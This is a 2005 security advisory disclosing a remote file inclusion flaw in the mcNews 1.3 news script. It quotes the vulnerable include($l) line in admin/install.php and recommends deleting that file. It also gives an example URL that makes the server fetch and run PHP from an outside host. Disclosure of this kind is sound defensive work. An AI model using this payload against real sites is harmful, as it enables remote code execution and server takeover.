-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- BadRoot Security Advisory 2005-#0x01 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Thu Mar 17 2005 - 00:46 am GMT +1 Product: mcNews <=1.3 (successfully exploited on 1.3) Vendor: http://www.phpforums.net/index.php?dir=dld (Home Page) Type: Arbitrary file inclusion Author: Jonathan Whiteley (Vukodlak) Product description: ----------------------------------- A News Management script. Vulnerable code: ----------------------------------- --> admin/install.php ... 33 if ($table==1) 34 { 35 include($l); 36 echo ''.$lGoAdmin.''; 37 } ... Impact: ----------------------------------- Anyone can inject PHP code by calling: http://vuln-host.com/path/to/mcnews/admin/install.php?l=http://some.php/source Solution: ----------------------------------- Remove install.php, it's futile after first installation. Contact: ----------------------------------- IRC: irc.us.azzurra.org - #badroot - Vukodlak E-Mail: jon.whiteley@gmail.com HP: http://www.badroot.org Cheers PS: Thanks to Arak for aid ;)